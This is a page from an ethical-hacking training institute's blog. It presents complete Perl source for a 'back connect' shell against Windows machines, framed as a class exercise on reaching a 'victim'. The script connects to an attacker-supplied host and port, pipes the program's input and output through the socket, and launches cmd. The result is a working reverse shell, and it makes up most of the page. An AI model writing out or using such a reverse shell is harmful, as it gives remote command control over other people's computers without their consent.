ExtremeHacking
Today : | Time : | safemode : ON
> / Main Website / Cyber Surakha Abhiyan / Hackers Charity / Linkedin / facebook / twitter /
Name Author Perms Com Modified Label

A simple program in perl for back connecting to windows machine Unknown rwxr-xr-x 0 6/18/2013

Filename A simple program in perl for back connecting to windows machine
Permission rw-r--r--
Author Unknown
Date and Time 6/18/2013
Label
Action
Ethical Hacking Institute in Pune
./Arizona Team

























Hello friends welcome back to programing zone of Arizona. Today we are going to see how to back connect a victim if he is using windows machine.

In the CEH class I have already shown how to code your own batch and python codes. Today we will see the same stuff but using perl programing.

Go through the logical flow of the code and create your own perl program for back connecting to victim machine. If any difficulty you can write to me at instructor@arizonainfotech.com


Here is the Code:

#!/usr/bin/perl 

use IO::Socket; 

$system = 'cmd'; 

$ARGC=@ARGV; 

print "\n--== Arizona Back Connect shell for Windows ==-- \n\n"; 

print "\n--==H0Me : www.arizonainfotech.com ==--\n\n"; 


if ($ARGC!=2) { 

print "Us4g3: $0 [Host] [Port] \n\n"; 

die "Ex3mpl3: $0 127.0.0.1 2121 \n"; 



use Socket; 

use FileHandle; 

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 

connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 

print "[+] Resolving HostName\n"; 

print "[+] Connecting... $ARGV[0] \n"; 

print "[+] Spawning Shell \n"; 

print "[+] Connected to remote host \n"; 

SOCKET->autoflush(); 

open(STDIN, ">&SOCKET"); 

open(STDOUT,">&SOCKET"); 

open(STDERR,">&SOCKET"); 

print "\n--== Arizona Back Connect shell for Windows ==-- \n\n"; 

print "\n--==H0Me : www.arizonainfotech.com ==--\n\n"; 


system($system); 

#tchaw

www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE
 

Cyber Suraksha Abhiyan | Sadik Shaikh © 2015 Sadik Shaikh | CEH V9 | ETHICAL HACKING Course Training Institute in India-Pune
Extreme Hacking Template design by Sadik Shaikh | Cyber Suraksha Abhiyan